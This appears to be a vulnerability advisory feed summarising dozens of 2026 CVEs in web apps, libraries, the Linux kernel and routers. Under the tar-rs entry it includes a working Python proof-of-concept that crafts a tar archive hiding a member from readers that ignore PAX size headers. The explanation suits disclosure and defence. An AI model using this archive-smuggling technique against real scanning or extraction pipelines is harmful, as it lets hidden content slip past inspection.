WeGIA versions 3.6.5 and 3.6.6 contain an unauthenticated SQL injection vulnerability in the loadBackupDB() function that fails to validate SQL content within uploaded backup archives. An attacker can craft a malicious backup file to execute arbitrary SQL statements, including creation of rogue administrator accounts, password modification, or complete database compromise. The vulnerability was introduced in commit 370104c and patched in version 3.6.7; no active exploitation in the wild has been confirmed, but the simplicity of the attack vector and availability of proof-of-concept references via GitHub advisory suggest moderate real-world risk.
SQLi
-
CVE-2026-33124
HIGH
CVSS 8.8
Frigate versions prior to 0.17.0-beta1 contain an authentication weakness in the /users/{username}/password endpoint: any authenticated user can change another user's password without supplying the current password, existing JWT tokens are not invalidated when a password changes, and no password strength validation is applied. An attacker who obtains a valid session token (through XSS, accidental exposure, cookie theft, a compromised device, or unencrypted HTTP sniffing) can permanently hijack the victim's account by changing the password while keeping access through the non-invalidated token. No active exploitation in the wild has been reported (KEV status unknown), but the straightforward nature of the attack and the common exposure vectors for JWT tokens make this a practical threat requiring immediate patching.
XSS
Authentication Bypass
-
CVE-2026-33075
HIGH
CVSS 8.8
FastGPT versions 4.14.8.3 and below contain a critical arbitrary code execution vulnerability in the fastgpt-preview-image.yml GitHub Actions workflow that allows external contributors to execute malicious code and exfiltrate repository secrets. The vulnerability stems from unsafe use of pull_request_target with attacker-controlled Dockerfile builds that are pushed to the production container registry, enabling both direct compromise and supply chain attacks. No patch was available at the time of public disclosure for the AI Agent building platform's affected versions.
RCE
Docker
-
CVE-2026-33072
HIGH
CVSS 8.2
FileRise, a self-hosted web file manager and WebDAV server, contains a critical hardcoded encryption key vulnerability in versions prior to 3.9.0. The default key 'default_please_change_this_key' is used for all cryptographic operations including HMAC token generation, AES configuration encryption, and session tokens, allowing unauthenticated attackers to forge upload tokens for arbitrary file upload and decrypt sensitive admin configuration data such as OIDC client secrets and SMTP passwords. No evidence of active exploitation (not in CISA KEV) is currently available, though the vulnerability is straightforward to exploit given the hardcoded nature of the default key.
File Upload
Authentication Bypass
-
CVE-2026-33069
HIGH
CVSS 7.5
PJSIP versions 2.16 and below contain a cascading out-of-bounds heap read vulnerability in the pjsip_multipart_parse() function that allows attackers to read 1-2 bytes of adjacent heap memory when processing SIP messages with multipart bodies or SDP content. The vulnerability affects all applications using PJSIP to process incoming SIP messages, as the flaw does not require authentication or user interaction and can be triggered remotely over the network. While the confidentiality impact per read is low, the low attack complexity and remote exploitability make this a practical concern for SIP-based communication systems.
Buffer Overflow
Information Disclosure
-
CVE-2026-33055
HIGH
CVSS 8.1
The tar-rs Rust library versions 0.4.44 and below contain a logic flaw where PAX (POSIX.1-2001) size headers are conditionally skipped when the base tar header size is nonzero, causing the library to parse tar archives differently than other standard tar implementations like Go's archive/tar. This discrepancy allows an attacker to craft malicious tar archives that appear different when unpacked by tar-rs versus other parsers, potentially leading to information disclosure or file confusion attacks. The vulnerability affects any application using tar-rs to parse untrusted archives and expecting consistent behavior with other tar parsers; the CVSS vector indicates low attack complexity and network accessibility.
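The parser differential is easiest to see with a concrete archive. The Python below is an added example, not tar-rs or Go code: it builds a small PAX archive in which `a.txt` carries a ustar size of 1536 bytes but a PAX `size` record of 4, then reads it with a model reader whose `pax_size_overrides_nonzero` flag toggles between standard behaviour (PAX wins) and the described tar-rs behaviour (PAX honoured only when the ustar size is zero). Python's own `tarfile` module serves as the "other implementation" reference. The file names and contents are constructed for the example.

```python
import io
import tarfile

BLOCK = 512


def _octal(value: int, width: int) -> bytes:
    return f"{value:0{width - 1}o}\0".encode("ascii")


def ustar_header(name: str, size: int, typeflag: str) -> bytes:
    """512-byte ustar header with a valid checksum (mode 0644, uid/gid/mtime 0)."""
    h = bytearray(BLOCK)
    h[0:len(name)] = name.encode("ascii")
    h[100:108] = _octal(0o644, 8)
    h[108:116] = _octal(0, 8)
    h[116:124] = _octal(0, 8)
    h[124:136] = _octal(size, 12)
    h[136:148] = _octal(0, 12)
    h[148:156] = b" " * 8                 # checksum field counts as spaces while summing
    h[156] = ord(typeflag)
    h[257:263] = b"ustar\0"
    h[263:265] = b"00"
    h[148:156] = f"{sum(h):06o}\0 ".encode("ascii")
    return bytes(h)


def _pad(data: bytes) -> bytes:
    return data + b"\0" * (-len(data) % BLOCK)


def pax_record(key: str, value: str) -> bytes:
    """One PAX record, '<len> key=value\\n', where len counts the whole record."""
    body = f" {key}={value}\n"
    n = len(body) + 1
    while len(str(n)) + len(body) > n:
        n += 1
    return f"{n}{body}".encode("ascii")


def _checksum_ok(hdr: bytes) -> bool:
    stored = int(hdr[148:156].split(b"\0", 1)[0].strip() or b"0", 8)
    return stored == sum(hdr[:148]) + 8 * 32 + sum(hdr[156:])


def _parse_pax(raw: bytes) -> dict:
    fields, i = {}, 0
    while i < len(raw):
        n = int(raw[i:raw.index(b" ", i)])
        key, value = raw[i + len(str(n)) + 1:i + n - 1].decode().split("=", 1)
        fields[key] = value
        i += n
    return fields


def list_entries(blob: bytes, pax_size_overrides_nonzero: bool):
    """Model tar reader. With the flag False it reproduces the described tar-rs behaviour:
    the PAX 'size' record is honoured only when the ustar size field is zero."""
    entries, pending, pos = [], {}, 0
    while pos + BLOCK <= len(blob):
        hdr = blob[pos:pos + BLOCK]
        pos += BLOCK
        if hdr == b"\0" * BLOCK:
            break
        if not _checksum_ok(hdr):
            raise ValueError(f"bad header checksum at offset {pos - BLOCK}")
        name = hdr[0:100].split(b"\0", 1)[0].decode()
        size = int(hdr[124:136].split(b"\0", 1)[0] or b"0", 8)
        if chr(hdr[156]) == "x":
            pending = _parse_pax(blob[pos:pos + size])
        else:
            if "size" in pending and (size == 0 or pax_size_overrides_nonzero):
                size = int(pending["size"])
            pending = {}
            entries.append((name, blob[pos:pos + size]))
        pos += -(-size // BLOCK) * BLOCK     # data is always block-padded
    return entries


def build_differential_archive() -> bytes:
    """Constructed sample: a.txt claims 1536 bytes in ustar but 4 bytes in PAX, so the
    blocks holding b.txt's header and data sit inside a.txt's ustar-sized payload."""
    pax = pax_record("size", "4")
    blob = ustar_header("PaxHeaders/a.txt", len(pax), "x") + _pad(pax)
    blob += ustar_header("a.txt", 3 * BLOCK, "0") + _pad(b"SAFE")
    blob += ustar_header("b.txt", 14, "0") + _pad(b"hidden payload")
    return blob + b"\0" * (2 * BLOCK)


def reference_listing(blob: bytes):
    """What Python's tarfile, a PAX-honouring reader, sees in the same bytes."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tf:
        return [(m.name, tf.extractfile(m).read()) for m in tf.getmembers()]


if __name__ == "__main__":
    blob = build_differential_archive()
    print("PAX honoured :", [(n, len(d)) for n, d in list_entries(blob, True)])
    print("PAX ignored  :", [(n, len(d)) for n, d in list_entries(blob, False)])
    print("tarfile      :", [(n, len(d)) for n, d in reference_listing(blob)])
```

A reader that honours PAX sees two members, `a.txt` (4 bytes) and `b.txt`; a reader that ignores the PAX size sees a single 1536-byte `a.txt` and never learns `b.txt` exists. Any pipeline that scans an archive with one implementation and extracts it with the other can be shown different contents.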
Information Disclosure
Memory Corruption
-
CVE-2026-33037
HIGH
CVSS 8.1
WWBN AVideo open source video platform versions 25.0 and below ship with a hardcoded default administrator password ('password') in official Docker deployment files that is automatically used during installation without any forced change mechanism. Attackers can gain immediate administrative access to unpatched instances, enabling user data exposure, content manipulation, and potential remote code execution via file upload and plugin management features. The issue is compounded by weak MD5 password hashing and similarly insecure default database credentials (avideo/avideo).
RCE
Information Disclosure
Docker
-
CVE-2026-33025
HIGH
CVSS 8.8
SQL injection in AVideo versions before 8.0 allows authenticated attackers to manipulate database queries through unsanitized sort parameters in POST requests, potentially leading to unauthorized data access or modification. The vulnerability stems from improper use of real_escape_string() on SQL identifiers rather than string literals, rendering the escaping mechanism ineffective. Affected organizations should upgrade to version 8.0 or implement WAF rules restricting sort parameter characters to alphanumeric and underscore values.
PHP
SQLi
-
CVE-2026-33013
HIGH
CVSS 7.5
The Micronaut Framework contains an infinite loop vulnerability in its form-urlencoded body binding mechanism that occurs when array indices are processed in descending order, allowing remote attackers to trigger denial of service through CPU exhaustion and out-of-memory conditions. Versions prior to 4.10.16 and 3.10.5 are affected, with the vulnerability exploitable by sending crafted indexed form parameters without authentication. No public exploit code has been confirmed, but the issue is straightforward to trigger and has been patched in the referenced versions.
Java
Denial Of Service
-
CVE-2026-33010
HIGH
CVSS 8.1
A CORS misconfiguration vulnerability in mcp-memory-service allows any malicious website to perform cross-origin requests to the HTTP API. Versions prior to 10.25.1 of mcp-memory-service from doobidoo are affected, particularly when the HTTP server is enabled with anonymous access, allowing attackers to read, modify, and delete all stored memories without authentication. No KEV listing or public exploitation indicators are currently reported, though the vulnerability's simplicity and the availability of a GitHub security advisory suggest proof-of-concept development would be straightforward.
Cors Misconfiguration
Information Disclosure
-
CVE-2026-32989
HIGH
CVSS 8.6
Precurio Intranet Portal 4.4 contains a CSRF vulnerability that allows attackers to trick authenticated users into uploading malicious files to the server, potentially leading to remote code execution with web server privileges. A public exploit is available via PacketStorm (file ID 215644), significantly lowering the barrier for exploitation. The attack vector is network-based and requires only user interaction.
CSRF
RCE
-
CVE-2026-32954
HIGH
CVSS 7.1
A blind SQL injection vulnerability exists in ERPNext, a free and open-source Enterprise Resource Planning system, affecting versions prior to 15.100.0 and beta versions 16.0.0-beta.1 through 16.7.x. The vulnerability allows authenticated attackers with low-level privileges to perform time-based and boolean-based blind SQL injection attacks through insufficiently validated parameters on certain endpoints, enabling them to infer and extract sensitive database information. It has been assigned EUVD-2026-13547 by ENISA, with patches available in versions 15.100.0 and 16.8.0.
SQLi
-
CVE-2026-32950
HIGH
CVSS 8.8
SQLBot, an intelligent data query system based on large language models and RAG, contains a critical SQL injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that allows authenticated users with minimal privileges to achieve remote code execution on the backend server. SQLBot versions prior to 1.7.0 are affected, and attackers can exploit unsafe concatenation of Excel sheet names into PostgreSQL table names and COPY statements to inject malicious SQL commands. The vulnerability enables arbitrary command execution as the postgres user, database takeover, and sensitive file exfiltration including /etc/passwd and /etc/shadow.
SQLi
RCE
PostgreSQL
Command Injection
-
CVE-2026-32949
HIGH
CVSS 7.5
A Server-Side Request Forgery (SSRF) vulnerability in SQLBot, an intelligent data query system based on large language models and RAG, allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. SQLBot versions prior to 1.7.0 are affected, with the vulnerability exploitable through the /api/v1/datasource/check endpoint by configuring a malicious MySQL data source that triggers a LOAD DATA LOCAL INFILE attack during connection verification. The network-based attack vector with no privileges required makes this a serious exposure, though the absence of a KEV listing or EPSS data suggests exploitation in the wild has not yet been widely observed.
SSRF
-
CVE-2026-32942
HIGH
CVSS 8.1
PJSIP versions 2.16 and earlier contain a heap use-after-free vulnerability in ICE session handling caused by race conditions between session destruction and callback execution, enabling memory corruption and potential code execution. This flaw affects all systems using vulnerable PJSIP versions for multimedia communication and currently has no available patch. With a CVSS score of 8.1, the vulnerability is remotely exploitable without authentication or user interaction.
Information Disclosure
Use After Free
Memory Corruption
-
CVE-2026-32939
HIGH
CVSS 8.1
DataEase versions 2.10.19 and below contain a locale-dependent validation bypass vulnerability that allows attackers to smuggle dangerous JDBC parameters past security filters. The flaw stems from inconsistent locale handling where DataEase's validation uses the JVM default locale while H2 JDBC always uses English locale, causing Turkish locale environments to misinterpret malicious parameters like 'iNIT' (bypassing blacklist as 'İNIT' while H2 executes it as 'INIT'). This has been confirmed as exploitable in real deployment scenarios and enables authenticated attackers with low privileges to achieve high-impact code execution or data access, though there is no evidence yet of active exploitation or public proof-of-concept.
Java
Authentication Bypass
-
CVE-2026-32933
HIGH
CVSS 7.5
AutoMapper, a widely-used convention-based object-object mapper for .NET applications, contains a stack exhaustion vulnerability that allows remote attackers to crash applications via deeply nested object graphs. Versions prior to 15.1.1 and 16.1.1 are affected. An unauthenticated attacker can trigger a StackOverflowException by sending specially crafted nested objects, causing immediate application termination with high availability impact (CVSS 7.5).
Denial Of Service
-
CVE-2026-32888
HIGH
CVSS 8.8
Open Source Point of Sale (opensourcepos) contains a critical SQL Injection vulnerability in the Items search functionality when custom attribute search is enabled. An authenticated attacker with basic item search permissions can execute arbitrary SQL queries by manipulating the search GET parameter, which is directly interpolated into a HAVING clause without sanitization. The vulnerability affects all versions up to and including 3.4.1, carries a CVSS score of 8.8 (High), and had no patch available at the time of publication.
SQLi
PHP
-
CVE-2026-32887
HIGH
CVSS 7.4
Node.js applications using Effect library versions 3.19.15 and earlier with @effect/rpc 0.72.1 and @effect/platform 0.94.2 are vulnerable to context confusion due to improper AsyncLocalStorage handling in the MixedScheduler, allowing attackers to access sensitive data from other concurrent requests through race conditions. An attacker can exploit the batching mechanism to read or modify context belonging to different requests processed in the same microtask cycle, potentially leading to data leakage between users in multi-tenant environments. No patch is currently available.
Node.js
Race Condition
Authentication Bypass
-
CVE-2026-32873
HIGH
CVSS 7.5
The ewe Gleam web server contains an infinite loop vulnerability in the handle_trailers function that permanently wedges the BEAM process at 100% CPU when processing rejected trailer headers in chunked HTTP requests. Versions 0.8.0 through 3.0.4 are affected, and any unauthenticated remote attacker can exploit this before application code executes, making mitigation at the application level impossible. The vulnerability is patched in version 3.0.5, and while no active exploitation (KEV) or EPSS score is reported, the low attack complexity and network accessibility make this a readily exploitable denial-of-service condition.
Denial Of Service
-
CVE-2026-32829
HIGH
CVSS 8.2
Information disclosure in lz4_flex compression library versions 0.11.5 and below and 0.12.0 allows attackers to read sensitive data from uninitialized memory or previous decompression operations through crafted LZ4 input that triggers out-of-bounds reads in the block-based decompression API. The vulnerability affects Ubuntu and Debian systems using vulnerable versions of lz4_flex, particularly when the safe-decode feature is disabled. No patch is currently available, leaving affected systems exposed to potential exposure of cryptographic keys and other sensitive data.
Information Disclosure
-
CVE-2026-32808
HIGH
CVSS 8.1
pyLoad, a free and open-source download manager written in Python, contains a path traversal vulnerability in versions before 0.5.0b3.dev97 that allows arbitrary file deletion outside the extraction directory during password verification of encrypted 7z archives with non-encrypted headers. Attackers can exploit this vulnerability remotely with low complexity, requiring only user interaction, to delete arbitrary files on the system. The CVSS score is 8.1 (High severity), though no active exploitation (KEV) or public proof-of-concept has been reported at this time.
Path Traversal
Python
-
CVE-2026-32711
HIGH
CVSS 7.8
Path traversal in pydicom versions 2.0.0-rc.1 through 3.0.1 allows local attackers to read, copy, or delete arbitrary files outside the File-set root directory by crafting malicious ReferencedFileID values in DICOMDIR files. The vulnerability exists because pydicom fails to validate that resolved file paths remain within the intended File-set root before performing file I/O operations like copy(), write(), and remove(). No patch is currently available for affected versions.
Python
Path Traversal
-
CVE-2026-32710
HIGH
CVSS 8.5
Authenticated users can trigger a heap overflow in MariaDB 11.4 (before 11.4.10) and 11.8 (before 11.8.6) through the JSON_SCHEMA_VALID() function, causing denial of service and potentially remote code execution under specific memory layout conditions. The vulnerability requires valid database credentials and affects server availability and integrity across scope boundaries. Releases 11.4.10 and 11.8.6 mark the end of the affected ranges.
RCE
Buffer Overflow
Heap Overflow
-
CVE-2026-32701
HIGH
CVSS 7.5
Qwik, a performance-focused JavaScript framework, contains an array prototype pollution vulnerability in its FormData parsing logic that affects versions prior to 1.19.2. Attackers can submit specially crafted form field names using mixed array-index and object-property keys (e.g., items.0 alongside items.toString or items.length) to inject malicious properties into objects the application expects to be arrays, leading to denial of service through malformed array states, oversized lengths, or request handling failures. The vulnerability has a CVSS score of 7.5 (High severity) with network-based exploitation requiring no authentication or user interaction, and a patch is available in version 1.19.2.
Memory Corruption
Denial Of Service
-
CVE-2026-32318
HIGH
CVSS 7.6
A man-in-the-middle vulnerability in Cryptomator for iOS versions prior to 2.8.3 allows attackers who can modify the vault.cryptomator configuration file to intercept authentication tokens by substituting malicious API endpoints while maintaining legitimate authentication endpoints. This affects users unlocking Hub-backed vaults in environments where attackers have write access to vault configuration files. No evidence of active exploitation (not in CISA KEV) has been reported, and patches are available.
Information Disclosure
Hashicorp
Apple
iOS
-
CVE-2026-32317
HIGH
CVSS 7.6
An integrity check vulnerability in Cryptomator for Android prior to version 1.12.3 allows attackers to tamper with the vault configuration file, enabling a man-in-the-middle attack against the Hub key loading mechanism. Attackers who can modify the vault.cryptomator file can mix legitimate authentication endpoints with malicious API endpoints to exfiltrate tokens from users unlocking Hub-backed vaults. With a CVSS score of 7.6 and requiring low attack complexity with user interaction, this vulnerability poses a moderate risk to affected users in environments where vault configuration files can be altered.
Information Disclosure
Google
Hashicorp
Android
-
CVE-2026-32309
HIGH
CVSS 8.7
Cryptomator's Hub-based unlock flow contains a protocol downgrade vulnerability that allows the application to communicate with Hub endpoints over plaintext HTTP instead of enforcing HTTPS. Cryptomator versions prior to 1.19.1 are affected, exposing OAuth bearer tokens, key-loading traffic, and endpoint-level trust decisions to network interception and tampering by active attackers. This is a verified GitHub security advisory with patches available in version 1.19.1, though no EPSS score or KEV listing indicates limited evidence of active exploitation.
Information Disclosure
Hashicorp
-
CVE-2026-32303
HIGH
CVSS 7.6
Cryptomator versions prior to 1.19.1 contain an integrity check vulnerability that allows attackers to tamper with the vault.cryptomator configuration file, enabling man-in-the-middle attacks during Hub key loading. Attackers can mix legitimate authentication endpoints with malicious API endpoints to exfiltrate access tokens from users unlocking Hub-backed vaults in environments where vault configuration files can be modified. The CVSS score of 7.6 indicates high severity with network attack vector requiring low privileges and user interaction, though no active exploitation (KEV) or public POC has been reported at this time.
Information Disclosure
Hashicorp
-
CVE-2026-31836
HIGH
CVSS 8.1
A mass assignment vulnerability in Checkmate's user profile update endpoint allows any authenticated user to escalate their privileges to superadmin level, bypassing all role-based access controls. Checkmate, an open-source self-hosted server monitoring tool from Bluewave Labs, is affected in versions 3.5.1 and prior. Attackers can gain complete administrative access to view all users, modify critical configurations, and access sensitive system data, though no public patches are currently available.
Authentication Bypass
-
CVE-2026-29189
HIGH
CVSS 8.1
A critical access control vulnerability exists in the SuiteCRM REST API V8 where multiple endpoints lack proper ACL (Access Control List) validation, enabling authenticated users to access and modify data beyond their authorized permissions. This affects SuiteCRM versions prior to 7.15.1 and 8.9.3, allowing privilege escalation within the CRM system where low-privileged users can potentially access sensitive customer data, modify records, or perform administrative actions. With a CVSS score of 8.1 and authentication bypass capabilities, this represents a significant security risk for organizations using affected versions.
Authentication Bypass
-
CVE-2026-29109
HIGH
CVSS 7.2
Unsafe deserialization in SuiteCRM versions up to 8.9.2 allows authenticated administrators to execute arbitrary system commands on the server through the SavedSearch filter processing component. The vulnerability stems from improper handling of unserialized data in the FilterDefinitionProvider.php file, which fails to restrict instantiable classes when processing user-controlled input from the database. SuiteCRM 8.9.3 and later versions contain the fix.
PHP
Deserialization
-
CVE-2026-27625
HIGH
CVSS 8.1
Stirling-PDF, a locally hosted web application for PDF operations, contains a path traversal vulnerability in the /api/v1/convert/markdown/pdf endpoint that allows authenticated users to write arbitrary files outside the intended directory. Versions prior to 2.5.2 are affected, enabling attackers to overwrite writable files with the privileges of the stirlingpdfuser process account, compromising data integrity and potentially availability. The vulnerability has been patched in version 2.5.2, and while CVSS rates it 8.1 (High), authentication is required which reduces immediate risk.
Path Traversal
-
CVE-2026-23536
HIGH
CVSS 7.5
The Feast Feature Server contains a path traversal vulnerability in its `/read-document` endpoint that allows unauthenticated remote attackers to read arbitrary files accessible to the server process, including sensitive system files, application configurations, and credentials. Red Hat OpenShift AI (RHOAI) deployments are confirmed affected across multiple versions. The vulnerability is rated 7.5 (High) with network-based exploitation requiring no authentication or user interaction, though no active exploitation (KEV) or public proof-of-concept is currently documented.
Path Traversal
Redhat
-
CVE-2026-23278
HIGH
CVSS 7.8
A resource management flaw in the Linux kernel's netfilter nf_tables subsystem fails to properly iterate over all pending catchall elements during transaction processing, leading to incomplete cleanup when a map holding catchall elements is destroyed. This affects Linux kernel versions across multiple stable branches and can result in memory corruption, information disclosure, or denial of service when crafted netfilter rule transactions are processed. The vulnerability is not known to be actively exploited in the wild, but patches have been issued across multiple stable branches.
Linux
Information Disclosure
Redhat
Suse
-
CVE-2026-23275
HIGH
CVSS 7.8
A race condition exists in the Linux kernel's io_uring subsystem where task work flags can be manipulated on stale ring memory during concurrent ring resize operations when DEFER_TASKRUN or SETUP_TASKRUN modes are enabled. This vulnerability affects Linux kernel versions including 6.13, 6.18.19, 6.19.9, and 7.0-rc4, and could allow an attacker with local code execution capabilities to cause information disclosure or kernel memory corruption. The vulnerability has been patched across multiple stable kernel versions as evidenced by available git commits, though no active KEV status or EPSS score has been published.
Linux
Information Disclosure
Redhat
Suse
-
CVE-2026-23274
HIGH
CVSS 7.8
This vulnerability exists in the Linux kernel's netfilter xt_IDLETIMER module, where revision 0 rules can cause a kernel panic by attempting to reuse timer objects created by revision 1 with ALARM semantics. An attacker with the ability to insert netfilter rules (requiring CAP_NET_ADMIN or equivalent privileges) can trigger uninitialized timer_list access, leading to debugobjects warnings and kernel panic when panic_on_warn=1 is enabled. No active exploitation in the wild has been reported, but patches are available across multiple stable kernel versions.
Linux
Information Disclosure
Redhat
Suse
-
CVE-2026-23273
HIGH
CVSS 7.8
A use-after-free race condition exists in the Linux kernel's macvlan driver within the macvlan_common_newlink() error handling path. When a macvlan device creation fails after the network device becomes visible to the RCU (Read-Copy-Update) subsystem, the caller's subsequent free_netdev(dev) can race with ongoing packet forwarding operations, causing kernel memory corruption and potential information disclosure. This vulnerability affects Linux kernel versions 5.10 through 6.19 and later, and while no public exploit exists, the issue is reproducible via crafted netlink commands that trigger concurrent device creation and packet transmission.
Linux
Information Disclosure
Redhat
Suse
-
CVE-2026-23272
HIGH
CVSS 7.8
A use-after-free vulnerability exists in the Linux kernel's netfilter nf_tables subsystem where a set element can be published and removed without waiting for RCU grace period completion, allowing concurrent RCU readers to access freed memory. This affects all Linux kernel versions across multiple stable branches (4.10 and later) as indicated by the CPE cpe:2.3:a:linux:linux:*:*:*:*:*:*:*:*. An attacker with local access to manipulate netfilter rules could trigger information disclosure or denial of service by exploiting the race condition during batch insertion of elements into a full netfilter set.
Information Disclosure
Linux
Redhat
Suse
-
CVE-2026-23271
HIGH
CVSS 7.8
A race condition exists in the Linux kernel's perf subsystem where __perf_event_overflow() can execute with only preemption disabled (rather than IRQs disabled) on software events, creating a window for concurrent execution with perf_event_exit_event() and related cleanup functions. This race condition allows the overflow handler to access kernel structures (such as BPF programs) that are being freed concurrently, potentially leading to use-after-free conditions, memory corruption, or privilege escalation. The vulnerability affects multiple stable Linux kernel versions and has patches available across multiple kernel branches (6.12.77, 6.19.7, 7.0-rc2, and others as indicated by the git commit references).
Linux
Buffer Overflow
Redhat
Suse
-
CVE-2026-22897
HIGH
CVSS 8.1
Remote command execution in QuNetSwitch versions prior to 2.0.4.0415 allows unauthenticated attackers to execute arbitrary system commands over the network with no user interaction required. The vulnerability stems from improper input validation in command processing functions, enabling complete system compromise. No patch is currently available for affected versions.
Command Injection
-
CVE-2026-22733
HIGH
CVSS 8.2
This is an authentication bypass vulnerability in Spring Boot applications using Spring Security with Actuator endpoints. When an authenticated application endpoint is declared under the CloudFoundry Actuator path, attackers can bypass authentication requirements and gain unauthorized access to protected resources. The vulnerability affects multiple versions of Spring Security from 2.7.0 through 4.0.3 and carries a high CVSS score of 8.2, though no active exploitation or proof-of-concept has been reported.
Authentication Bypass
Java
-
CVE-2026-22324
HIGH
CVSS 8.1
A PHP Local File Inclusion vulnerability exists in the ThemeREX Melania WordPress theme, allowing remote attackers to include and execute arbitrary local files on the server. All versions up to and including 2.5.0 are affected. The CVSS score of 8.1 indicates high severity with network-based attack vector, though attack complexity is rated as high; there is no evidence of active exploitation (not in KEV) or public proof-of-concept at this time.
PHP
Information Disclosure
Lfi
-
CVE-2026-22163
HIGH
CVSS 7.8
Unsafe IOCTL handling in the DDK kernel module allows local attackers with limited privileges to bypass GPU memory protections and write to arbitrary physical memory through race condition exploitation. This privilege escalation vulnerability affects systems using the vulnerable DDK driver and requires no user interaction to trigger. No patch is currently available.
RCE
-
CVE-2026-4519
HIGH
CVSS 7.0
The webbrowser.open() API in CPython accepts URLs with leading dashes, which certain web browsers interpret as command-line options rather than URLs, potentially leading to unintended command execution or information disclosure. This affects all CPython versions using the vulnerable webbrowser module. An attacker can craft a malicious URL containing leading dashes (e.g., '-P' or '--profile') that, when passed to webbrowser.open(), may trigger browser-specific behavior such as loading alternate profiles or executing browser commands, resulting in information disclosure or other security impacts.
Information Disclosure
-
CVE-2026-4508
HIGH
CVSS 7.3
SQL injection in PbootCMS versions up to 3.2.12 allows unauthenticated remote attackers to manipulate the Username parameter in the Member Login function, potentially enabling unauthorized database access and data manipulation. Public exploit code exists for this vulnerability, and no patch is currently available.
PHP
SQLi
-
CVE-2026-4504
HIGH
CVSS 7.3
SQL injection in eosphoros-ai db-gpt versions up to 0.7.5 allows unauthenticated remote attackers to manipulate the /api/v1/editor/ endpoint and execute arbitrary database queries. Public exploit code is available for this vulnerability, and no patch has been released despite vendor notification. This vulnerability impacts confidentiality, integrity, and availability of affected systems.
SQLi
-
CVE-2026-4493
HIGH
CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro MAC filtering configuration allows remote authenticated attackers to achieve full system compromise through manipulation of the deviceList parameter. Public exploit code exists for this vulnerability, and no patch is currently available. The flaw impacts the /goform/setMacFilterCfg endpoint with a CVSS score of 8.8.
Tenda
Buffer Overflow
Stack Overflow
-
CVE-2026-4492
HIGH
CVSS 8.8
Remote code execution in Tenda A18 Pro firmware 02.03.02.28 allows authenticated attackers to achieve full system compromise through stack-based buffer overflow in the QoS configuration function. Public exploit code exists for this vulnerability and no patch is currently available, leaving deployed devices at immediate risk.
Tenda
Buffer Overflow
Stack Overflow
-
CVE-2026-4491
HIGH
CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro firmware version 02.03.02.28 allows remote attackers with low privileges to achieve complete system compromise through manipulation of the SetIpMacBind function arguments. Public exploit code exists for this vulnerability, and no patch is currently available. An authenticated attacker can execute arbitrary code remotely without user interaction, affecting confidentiality, integrity, and availability of affected devices.
Tenda
Buffer Overflow
Stack Overflow
-
CVE-2026-4490
HIGH
CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro firmware version 02.03.02.28 enables authenticated remote attackers to achieve code execution with high privileges through the setSchedWifi function. Public exploit code is available for this vulnerability, and no patch has been released, leaving affected devices exposed to active exploitation. An attacker with network access and valid credentials can trigger the overflow to compromise system integrity and confidentiality.
Tenda
Buffer Overflow
Stack Overflow
-
CVE-2026-4489
HIGH
CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro firmware version 02.03.02.28 allows authenticated remote attackers to achieve complete system compromise through the /goform/fast_setting_wifi_set endpoint. Public exploit code is available and actively being weaponized against this unpatched vulnerability. Attackers with network access and valid credentials can execute arbitrary code with full system privileges.
Tenda
Buffer Overflow
Stack Overflow
-
CVE-2026-4488
HIGH
CVSS 8.8
Remote code execution in UTT HiPER 1250GW firmware versions up to 3.2.7 allows authenticated attackers to overflow a buffer in the /goform/setSysAdm function via a malicious GroupName parameter. Public exploit code exists for this vulnerability, and no patch is currently available. An attacker with valid credentials can achieve complete system compromise including code execution, data theft, and denial of service.
Buffer Overflow
-
CVE-2026-4487
HIGH
CVSS 8.8
Unauthenticated attackers can trigger a buffer overflow in UTT HiPER 1200GW firmware versions up to 2.5.3-170306 via the /goform/websHostFilter endpoint, enabling remote code execution with full system compromise. Public exploit code is available and there is currently no patch, leaving affected devices at immediate risk. The vulnerability requires only network access and valid credentials to exploit, making it readily actionable for threat actors.
Buffer Overflow
-
CVE-2026-4486
HIGH
CVSS 7.4
Remote code execution in D-Link DIR-513 1.10 via stack-based buffer overflow in the /goform/formEasySetPassword endpoint allows unauthenticated attackers to achieve full system compromise through a malicious curTime parameter. Public exploit code exists for this vulnerability, and affected devices are no longer receiving security updates from the vendor. An attacker with network access can execute arbitrary code with high privileges without user interaction.
Buffer Overflow
D-Link
Stack Overflow
-
CVE-2026-4478
HIGH
CVSS 8.1
The Yi Technology YI Home Camera 2 version 2.1.1_20171024151200 contains a cryptographic signature verification vulnerability in its HTTP firmware update handler, specifically in the home/web/ipc file component. An attacker can exploit this remotely (network-accessible) to bypass firmware integrity checks and potentially install malicious firmware, though the attack complexity is high and exploitation is considered difficult. A public exploit is available, significantly increasing risk despite the high complexity barrier.
Information Disclosure
-
CVE-2026-4475
HIGH
CVSS 8.8
A hard-coded credentials vulnerability exists in Yi Technology YI Home Camera 2 firmware version 2.1.1_20171024151200, specifically in the home/web/ipc file component. An unauthenticated attacker on the local network can exploit these credentials to gain full access to the device with high impact on confidentiality, integrity, and availability (CVSS 8.8). The exploit has been publicly disclosed via VulDB references, and the vendor did not respond to early disclosure attempts, indicating no official patch is available.
Authentication Bypass
-
CVE-2026-4464
HIGH
CVSS 8.8
Heap corruption in Google Chrome's ANGLE graphics library prior to version 146.0.7680.153 can be triggered remotely through a malicious HTML page, potentially enabling arbitrary code execution on affected systems. The vulnerability stems from an integer overflow condition that requires only user interaction with a crafted webpage, affecting Chrome users across Windows, macOS, and Linux platforms. A patch is available and security professionals should prioritize updating to the latest Chrome version to mitigate this high-severity risk.
Google
Buffer Overflow
Ubuntu
Debian
Chrome
-
CVE-2026-4463
HIGH
CVSS 8.8
Heap buffer overflow in Google Chrome's WebRTC component (versions prior to 146.0.7680.153) enables remote code execution when users visit a malicious webpage, requiring only user interaction to trigger the vulnerability. An attacker can exploit this heap corruption to execute arbitrary code with the privileges of the affected browser process. A patch is available for Chrome and affected Linux distributions including Ubuntu and Debian.
Google
Heap Overflow
Buffer Overflow
Ubuntu
Debian
-
CVE-2026-4462
HIGH
CVSS 8.8
